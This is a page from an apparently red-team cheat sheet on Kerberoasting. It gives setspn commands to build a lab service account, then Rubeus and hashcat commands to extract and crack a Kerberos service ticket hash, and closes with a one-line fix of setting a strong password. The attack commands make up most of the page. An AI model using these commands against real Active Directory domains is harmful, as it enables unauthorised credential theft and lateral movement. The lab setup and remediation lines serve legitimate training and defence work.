🕺
🕺
🕺
🕺
CheatSheets
Search…
Introduction
Getting Started With Hacking
VMs on Mac
Windows
Enumeration
Local Privilege Escalation
UAC Bypasses
Persistance
Networking
Active Directory
Offensive Powershell
Enumeration
Lateral Movement
Escalation
ACL Abuse
Kerberoasting
Un-Constrained Delegation
JEA
Persistance
Mimikatz
Alternate Cred Dumps
MSSQL
Defences and Bypasses
Setting Up a Lab
Red Teaming
Phishing Payloads
Cobalt Strike
Metasploit
Linux
Networking
Enumeration
Local Privilege Escalation
Persistance
MySQL
Mainframes
HP Nonstop
IBM z/OS
Cloud
AWS
GCP
Azure
Web App
Tomcat
SQLMap
PHP
Mobile
Android
iOS
Exploit-Dev
Linux
Shellcode
Windows
WiFi
Alfa AWUS036ACH Setup
Aircrack-ng
Powered By
GitBook
Kerberoasting
Making the Lab
Set up general ad lab.
Add in a new user called SQLService
Open a cmd on the DC and use:
1
setspn -a <DC-NAME>/SQLService.<domain>.local:60111 <DOMAIN>\SQLService
Copied!
You can then verify that the spn can be found:
1
setspn -T <DOMAIN>.local -Q */*
Copied!
Abuse
Rubeus is simplest way:
1
rubeus.exe kerberoast /simple /nowrap
Copied!
Hashcat to crack the hash:
1
hashcat kerb.txt -m 13100 /usr/share/wordlists/rockyou.txt --force
Copied!
Fixing
Could remove SPN from account but would break things.
Real fix is to use a strong password for the service account. This could be changed by:
1
net user SQLService NewPasswordThatShouldBeStrong
Copied!
Previous
ACL Abuse
Next
Un-Constrained Delegation
Last modified
2yr ago
Copy link
Contents
Making the Lab
Abuse
Fixing